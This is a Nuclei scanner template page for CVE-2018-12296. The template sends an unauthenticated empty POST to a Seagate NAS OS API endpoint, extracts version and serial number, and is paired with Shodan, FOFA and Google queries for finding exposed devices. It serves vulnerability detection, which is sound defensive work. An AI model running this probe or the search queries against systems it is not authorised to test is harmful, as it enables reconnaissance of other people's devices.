Skip to content
Nuclei Templates

Seagate NAS OS 4.3.15.1 - Server Information Disclosure

ID: CVE-2018-12296

Severity: high

Author: princechaddha

Tags: cve,cve2018,seagate,nasos,disclosure,unauth

Description

Section titled “Description”

Seagate NAS OS version 4.3.15.1 has insufficient access control which allows attackers to obtain information about the NAS without authentication via empty POST requests in /api/external/7.0/system.System.get_infos.

YAML Source

Section titled “YAML Source”
id: CVE-2018-12296


info:
  name: Seagate NAS OS 4.3.15.1 - Server Information Disclosure
  author: princechaddha
  severity: high
  description: Seagate NAS OS version 4.3.15.1 has insufficient access control which allows attackers to obtain information about the NAS without authentication via empty POST requests in /api/external/7.0/system.System.get_infos.
  impact: |
    An attacker can gain sensitive information about the server, potentially leading to further attacks.
  remediation: |
    Upgrade to a patched version of Seagate NAS OS.
  reference:
    - https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170
    - https://nvd.nist.gov/vuln/detail/CVE-2018-12296
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2018-12296
    cwe-id: CWE-732
    epss-score: 0.01442
    epss-percentile: 0.866
    cpe: cpe:2.3:o:seagate:nas_os:4.3.15.1:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: seagate
    product: nas_os
    shodan-query: http.title:"seagate nas - seagate"
    fofa-query: title="seagate nas - seagate"
    google-query: intitle:"seagate nas - seagate"
  tags: cve,cve2018,seagate,nasos,disclosure,unauth


http:
  - raw:
      - |
        POST /api/external/7.0/system.System.get_infos HTTP/1.1
        Host: {{Hostname}}
        Referer: {{BaseURL}}


    matchers:
      - type: word
        part: body
        words:
          - '"version":'
          - '"serial_number":'
        condition: and


    extractors:
      - type: regex
        group: 1
        regex:
          - '"version": "([0-9.]+)"'
        part: body
# digest: 490a0046304402206f97548859832c8104c59b169ef1df0c07eac62e0d4776398d8ca0bc17ee92a902203e5fe921c435beeada20ec7cbe1f36fd90e744723c00f6bcf05e8aad0046bbc2:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-12296.yaml"

View on Github